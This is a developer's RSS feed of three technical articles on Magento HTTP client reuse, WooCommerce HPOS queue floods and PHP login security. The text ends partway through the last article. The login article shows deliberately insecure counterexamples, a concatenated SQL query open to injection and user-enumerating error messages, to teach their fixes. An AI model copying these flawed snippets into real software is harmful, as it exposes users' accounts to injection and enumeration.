<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Robin Dhiman</title>
    <description>The latest articles on DEV Community by Robin Dhiman (@iamrobindhiman).</description>
    <link>https://dev.to/iamrobindhiman</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3983853%2Fcd0105a9-6591-488d-93d0-be66eb1f2ba8.jpeg</url>
      <title>DEV Community: Robin Dhiman</title>
      <link>https://dev.to/iamrobindhiman</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/iamrobindhiman"/>
    <language>en</language>
    <item>
      <title>The handshake tax: reuse your HTTP client in Magento integrations</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Fri, 03 Jul 2026 04:25:40 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/the-handshake-tax-reuse-your-http-client-in-magento-integrations-3kk7</link>
      <guid>https://dev.to/iamrobindhiman/the-handshake-tax-reuse-your-http-client-in-magento-integrations-3kk7</guid>
      <description>&lt;p&gt;I had a product export that talked to a third-party pricing API. One product, fast. The full catalog was painfully slow. The database was barely doing anything, so I went looking, and the profiler pointed somewhere I didn't expect: the network, before a single request was even sent.&lt;/p&gt;

&lt;p&gt;The code created a fresh HTTP client on every iteration of the loop.&lt;/p&gt;

&lt;h2&gt;
  
  
  The handshake tax
&lt;/h2&gt;

&lt;p&gt;Before you send one byte of an HTTPS request, the machine does a lot of quiet work.&lt;/p&gt;

&lt;p&gt;A TCP handshake to open the socket. Then a TLS handshake on top: certificate exchange, key negotiation, several round trips across the wire. Only after all of that does your actual &lt;code&gt;GET&lt;/code&gt; or &lt;code&gt;POST&lt;/code&gt; go out.&lt;/p&gt;

&lt;p&gt;Do it once and reuse the connection, you pay that tax once. Do it inside a loop over 40,000 products, you pay it 40,000 times. The request bodies are tiny. The setup is the whole bill.&lt;/p&gt;

&lt;h2&gt;
  
  
  PHP tricks you into it
&lt;/h2&gt;

&lt;p&gt;PHP is share-nothing. Every web request starts cold, so it feels natural to build a client, use it, and throw it away. For a single web request that hits one API once, that's fine. You were going to pay one handshake anyway.&lt;/p&gt;

&lt;p&gt;The trap is the long-running process. A cron job, a &lt;code&gt;bin/magento&lt;/code&gt; console command, a message-queue consumer syncing records to an ERP or a PIM. Those loop. And inside the loop, a lot of Magento integration code looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$products&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;\GuzzleHttp\Client&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;   &lt;span class="c1"&gt;// new connection every time&lt;/span&gt;
    &lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'https://api.example.com/sync'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;toPayload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every iteration opens a new connection, runs the full TCP + TLS dance, sends a few hundred bytes, and tears the connection down. The handshake runs N times for N products.&lt;/p&gt;

&lt;h2&gt;
  
  
  Reuse one client
&lt;/h2&gt;

&lt;p&gt;With its default cURL handler, Guzzle keeps the underlying connection alive between requests made on the same client instance. So build it once, outside the loop:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;\GuzzleHttp\Client&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;
    &lt;span class="s1"&gt;'base_uri'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'https://api.example.com'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;'headers'&lt;/span&gt;  &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'Connection'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'keep-alive'&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
&lt;span class="p"&gt;]);&lt;/span&gt;

&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$products&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'/sync'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;toPayload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;)]);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same requests, same payloads. But now the socket and the TLS session are reused across the loop. You handshake once, then stream the rest over the open connection.&lt;/p&gt;

&lt;p&gt;In a Magento module, go one step further and don't &lt;code&gt;new&lt;/code&gt; the client at all. Inject a configured client, or a small wrapper service, through the constructor. The same instance gets shared, and the connection survives across the calls that matter.&lt;/p&gt;
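
&lt;p&gt;A minimal sketch of such a wrapper, assuming your module's DI configuration supplies a configured Guzzle client (with a &lt;code&gt;base_uri&lt;/code&gt;) for the &lt;code&gt;ClientInterface&lt;/code&gt; type hint. The class name &lt;code&gt;PricingSyncClient&lt;/code&gt;, the &lt;code&gt;push()&lt;/code&gt; method, and the &lt;code&gt;/sync&lt;/code&gt; path are illustrative, not part of Magento or Guzzle:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;use GuzzleHttp\ClientInterface;

// Hypothetical wrapper service; every name here is for illustration only.
class PricingSyncClient
{
    private ClientInterface $client;

    public function __construct(ClientInterface $client)
    {
        // Supplied by the DI container and kept for the lifetime of this service.
        $this-&amp;gt;client = $client;
    }

    public function push(array $payload): int
    {
        // Each call goes through the same client instance.
        $response = $this-&amp;gt;client-&amp;gt;request('POST', '/sync', ['json' =&amp;gt; $payload]);

        return $response-&amp;gt;getStatusCode();
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The loop then calls &lt;code&gt;push()&lt;/code&gt; once per product and never constructs a client itself.&lt;/p&gt;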

&lt;h2&gt;
  
  
  The louder version
&lt;/h2&gt;

&lt;p&gt;In a long-lived runtime the same mistake gets worse. Create a client per call in a hot path and the cost compounds: on top of the repeated handshakes, you can run the machine out of outbound ports, because closed connections pile up in &lt;code&gt;TIME_WAIT&lt;/code&gt; faster than the OS reclaims them. The service stops being able to open new sockets at all. Same root cause, much louder failure.&lt;/p&gt;

&lt;p&gt;PHP's request model usually saves you from that specific cliff. It does not save you from the latency.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to find it
&lt;/h2&gt;

&lt;p&gt;Grep your integration code for clients built inside loops, or hidden in a method that runs once per record:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"new .*Client("&lt;/span&gt; app/code | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; http
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look for any &lt;code&gt;new \GuzzleHttp\Client()&lt;/code&gt; (or a raw &lt;code&gt;curl_init()&lt;/code&gt;) sitting inside a &lt;code&gt;foreach&lt;/code&gt;. That's the line paying the handshake tax on every pass.&lt;/p&gt;

&lt;p&gt;Move the client up, out of the loop, and let the connection stay open. It's a one-line change. On a sync that touches thousands of records, it's the cheapest speedup you'll find all day.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
      <category>apiintegration</category>
    </item>
    <item>
      <title>WooCommerce HPOS: when order sync floods Action Scheduler</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Tue, 30 Jun 2026 15:18:54 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/woocommerce-hpos-when-order-sync-floods-action-scheduler-2ib</link>
      <guid>https://dev.to/iamrobindhiman/woocommerce-hpos-when-order-sync-floods-action-scheduler-2ib</guid>
      <description>&lt;p&gt;A WooCommerce store starts misbehaving over a weekend. The database is swelling. The PHP error log is growing faster than the database. Background processing runs non-stop, and now you're seeing &lt;code&gt;Deadlock found&lt;/code&gt; and &lt;code&gt;INSERT command denied&lt;/code&gt; in the logs.&lt;/p&gt;

&lt;p&gt;The usual suspects get blamed first. Redis. The page cache. That custom plugin you shipped on Friday. A recent server upgrade.&lt;/p&gt;

&lt;p&gt;None of them are it.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's actually happening
&lt;/h2&gt;

&lt;p&gt;If the store is on &lt;strong&gt;HPOS&lt;/strong&gt; (High-Performance Order Storage, the order tables WooCommerce moved to a couple of years ago), there's a setting most people forget they enabled: compatibility mode.&lt;/p&gt;

&lt;p&gt;HPOS keeps orders in their own tables (&lt;code&gt;wp_wc_orders&lt;/code&gt;, &lt;code&gt;wp_wc_orders_meta&lt;/code&gt;, and friends) instead of the old &lt;code&gt;wp_posts&lt;/code&gt; / &lt;code&gt;wp_postmeta&lt;/code&gt; layout. Compatibility mode keeps both stores in sync so legacy code that still reads &lt;code&gt;wp_postmeta&lt;/code&gt; doesn't break. That sync runs through &lt;strong&gt;Action Scheduler&lt;/strong&gt;, WooCommerce's background job queue.&lt;/p&gt;

&lt;p&gt;Here's the trap. Every order change schedules a sync job. If anything is touching orders in a loop (an importer, a meta-rewriting cron, a plugin that re-saves every order on some hook), each touch enqueues another sync action. Failures get retried. The queue grows faster than the workers drain it, and Action Scheduler stores every one of those rows in your database.&lt;/p&gt;

&lt;p&gt;That's your runaway table. That's your deadlock.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop guessing. Query the queue.
&lt;/h2&gt;

&lt;p&gt;You don't debug this by disabling plugins one at a time. The queue table tells you exactly what's being scheduled. Action Scheduler keeps its jobs in &lt;code&gt;wp_actionscheduler_actions&lt;/code&gt;. Group them by hook:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;COUNT&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;wp_actionscheduler_actions&lt;/span&gt;
&lt;span class="k"&gt;GROUP&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="k"&gt;DESC&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One hook will dwarf the rest. That hook name is your culprit: it tells you which subsystem is enqueuing work in a loop. In one query, you go from a vague "something is wrong" to a named process scheduling hundreds of thousands of jobs.&lt;/p&gt;

&lt;p&gt;This is the same move I make on Magento when &lt;code&gt;cron_schedule&lt;/code&gt; or the message queue balloons: don't audit the whole stack, read the queue and &lt;code&gt;GROUP BY&lt;/code&gt; what's piling up. The component generating the work always names itself.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;Two parts.&lt;/p&gt;

&lt;p&gt;First, stop the bleeding. Once you've confirmed the store is fully on HPOS and nothing critical still reads the legacy tables, turn &lt;strong&gt;off&lt;/strong&gt; compatibility mode under WooCommerce → Settings → Advanced → Features. You stop paying the sync tax on every order write. Don't flip this blind on a store full of legacy plugins. Verify they read HPOS first.&lt;/p&gt;

&lt;p&gt;Second, clean up the backlog. Action Scheduler retains completed actions for 30 days by default, which is how a short burst leaves a long tail in your database. Lower the window with the &lt;code&gt;action_scheduler_retention_period&lt;/code&gt; filter and let the cleanup task reclaim the space, or purge completed actions from Tools → Scheduled Actions.&lt;/p&gt;
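
&lt;p&gt;As a rough sketch, lowering the window could look like this. It assumes the snippet lives in a small custom plugin or mu-plugin, and the one-week value is only an example. The filter expects a number of seconds:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;// Assumption: loaded from a custom plugin or mu-plugin.
// Keep finished actions for one week instead of the default window.
add_filter('action_scheduler_retention_period', function () {
    return WEEK_IN_SECONDS; // WordPress constant, value in seconds
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Pick a window that still leaves you enough history to debug the next incident.&lt;/p&gt;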

&lt;h2&gt;
  
  
  The lesson that travels
&lt;/h2&gt;

&lt;p&gt;The platform-specific bit is narrow: HPOS compatibility mode is expensive under heavy order writes. Keep that one for WooCommerce.&lt;/p&gt;

&lt;p&gt;The part that travels to every stack with a job queue: when background processing melts your database, the queue is the evidence, not the suspect list. Don't theorize about Redis. Count the rows by hook. Whatever is flooding you is already labelled.&lt;/p&gt;

</description>
      <category>woocommerce</category>
      <category>wordpress</category>
      <category>performance</category>
      <category>actionscheduler</category>
    </item>
    <item>
      <title>A PHP login form that won't get you owned</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Sun, 28 Jun 2026 16:42:47 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/a-php-login-form-that-wont-get-you-owned-n9n</link>
      <guid>https://dev.to/iamrobindhiman/a-php-login-form-that-wont-get-you-owned-n9n</guid>
      <description>&lt;p&gt;A login form is the most-copied, least-reviewed piece of PHP on the internet. Someone needs auth, they paste a tutorial from 2014, it "works," and it ships. Then it leaks.&lt;/p&gt;

&lt;p&gt;I've reviewed a lot of these. The same five mistakes show up every time. None of them are exotic. All of them are one function call away from being fixed.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Hashing passwords by hand
&lt;/h2&gt;

&lt;p&gt;If your code contains &lt;code&gt;md5()&lt;/code&gt;, &lt;code&gt;sha1()&lt;/code&gt;, or a salt you generated yourself, stop. PHP has had a real password API since 5.5.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// On signup&lt;/span&gt;
&lt;span class="nv"&gt;$hash&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;password_hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;PASSWORD_DEFAULT&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// On login&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$hash&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// authenticated&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;password_hash()&lt;/code&gt; picks a strong algorithm (bcrypt by default, Argon2id if you pass &lt;code&gt;PASSWORD_ARGON2ID&lt;/code&gt;), generates the salt for you, and stores the cost inside the hash string. &lt;code&gt;password_verify()&lt;/code&gt; does a constant-time comparison, so you don't leak timing. You never handle a salt again.&lt;/p&gt;

&lt;p&gt;When you raise the cost later, &lt;code&gt;password_needs_rehash()&lt;/code&gt; lets you re-hash transparently on the user's next login.&lt;/p&gt;
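
&lt;p&gt;A minimal sketch of that re-hash step. The helper name &lt;code&gt;refreshHashIfNeeded()&lt;/code&gt; and the cost values are assumptions for illustration. It returns a replacement hash to store, or &lt;code&gt;null&lt;/code&gt; when nothing needs to change:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;// Hypothetical helper: call it during login, while you still hold the plain password.
function refreshHashIfNeeded(string $password, string $storedHash, array $options = []): ?string
{
    if (!password_verify($password, $storedHash)) {
        return null; // wrong password: never re-hash
    }

    if (password_needs_rehash($storedHash, PASSWORD_DEFAULT, $options)) {
        // Stored hash uses an older algorithm or cost, so build a new one.
        return password_hash($password, PASSWORD_DEFAULT, $options);
    }

    return null; // hash is already up to date
}

// Example: a hash created at cost 10, checked against a new target of cost 12.
$old = password_hash('s3cret', PASSWORD_BCRYPT, ['cost' =&amp;gt; 10]);
$new = refreshHashIfNeeded('s3cret', $old, ['cost' =&amp;gt; 12]);
// $new now holds a cost-12 hash to save in place of $old.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The re-hash can only happen at login, because that is the one moment the plain password is available.&lt;/p&gt;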

&lt;h2&gt;
  
  
  2. Building the query with string concatenation
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Don't&lt;/span&gt;
&lt;span class="nv"&gt;$sql&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"SELECT * FROM users WHERE email = '&lt;/span&gt;&lt;span class="nv"&gt;$email&lt;/span&gt;&lt;span class="s2"&gt;'"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's SQL injection, on the front door of your app. Use a prepared statement, so the value is bound as data and never parsed as part of the SQL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$stmt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pdo&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'SELECT id, password_hash FROM users WHERE email = ?'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nv"&gt;$email&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Select only the columns you need. &lt;code&gt;SELECT *&lt;/code&gt; on a user row pulls fields you'll expose by accident later.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Not regenerating the session ID
&lt;/h2&gt;

&lt;p&gt;This one is invisible until someone exploits it. If you attach the logged-in state to the same session ID the visitor arrived with, you're open to session fixation: an attacker who can plant a session ID they know in the victim's browser before login inherits the authenticated session afterwards.&lt;/p&gt;

&lt;p&gt;One line, right after the password checks out:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nb"&gt;session_regenerate_id&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'user_id'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'id'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Regenerate on login, and again on logout and any privilege change.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Telling attackers which half they got right
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Leaks which emails exist&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'No account with that email'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;elseif&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password_hash'&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'Wrong password'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two different messages turn your login form into a user-enumeration oracle. An attacker scripts it to learn which emails are registered, then focuses on those.&lt;/p&gt;

&lt;p&gt;Return one message for both cases:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password_hash'&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Invalid email or password'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To close the timing gap when the user doesn't exist, verify against a dummy hash so both paths do the same work.&lt;/p&gt;
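
&lt;p&gt;One way to sketch the dummy-hash check. The helper name &lt;code&gt;credentialsAreValid()&lt;/code&gt; is hypothetical, and &lt;code&gt;$user&lt;/code&gt; is assumed to be the fetched row, or &lt;code&gt;false&lt;/code&gt; when no row matched:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;// Hypothetical helper: always runs exactly one password_verify() call.
function credentialsAreValid($user, string $password, string $dummyHash): bool
{
    // No user? Verify against the dummy hash so this path costs the same.
    $hash = $user ? $user['password_hash'] : $dummyHash;
    $matches = password_verify($password, $hash);

    // A match against the dummy hash must never count as a login.
    return $user ? $matches : false;
}

// Generate the dummy once (for example at deploy time) with the same
// algorithm and cost as real hashes, and keep it in configuration.
$dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The dummy only evens out the work when it uses the same algorithm and cost as your real hashes.&lt;/p&gt;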

&lt;h2&gt;
  
  
  5. Letting them guess forever
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;password_hash()&lt;/code&gt; is deliberately slow, which buys you a lot. It does not stop someone running a few hundred guesses at one account. That needs rate limiting.&lt;/p&gt;

&lt;p&gt;The cheap version: count failed attempts per email and per IP in a fast store (Redis, or an indexed table), then refuse or delay past a threshold. Reset the counter on success.&lt;/p&gt;

&lt;p&gt;You don't need a library to start. You need a counter and a ceiling.&lt;/p&gt;
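
&lt;p&gt;Here is an in-memory sketch of that counter and ceiling. The &lt;code&gt;LoginThrottle&lt;/code&gt; class, its method names, and the default limits are assumptions for illustration. A real app would keep the counts in Redis or a table so they survive between requests:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;// Hypothetical in-memory throttle; swap the array for Redis or a table in production.
final class LoginThrottle
{
    private array $failures = [];
    private int $maxFailures;
    private int $windowSeconds;

    public function __construct(int $maxFailures = 5, int $windowSeconds = 900)
    {
        $this-&amp;gt;maxFailures = $maxFailures;
        $this-&amp;gt;windowSeconds = $windowSeconds;
    }

    public function isBlocked(string $key, int $now): bool
    {
        $entry = $this-&amp;gt;failures[$key] ?? null;
        if ($entry === null || $now - $entry['since'] &amp;gt;= $this-&amp;gt;windowSeconds) {
            return false; // no failures yet, or the window has expired
        }

        return $entry['count'] &amp;gt;= $this-&amp;gt;maxFailures;
    }

    public function recordFailure(string $key, int $now): void
    {
        $entry = $this-&amp;gt;failures[$key] ?? null;
        if ($entry === null || $now - $entry['since'] &amp;gt;= $this-&amp;gt;windowSeconds) {
            $entry = ['count' =&amp;gt; 0, 'since' =&amp;gt; $now]; // start a new window
        }
        $entry['count']++;
        $this-&amp;gt;failures[$key] = $entry;
    }

    public function reset(string $key): void
    {
        unset($this-&amp;gt;failures[$key]); // call this on a successful login
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

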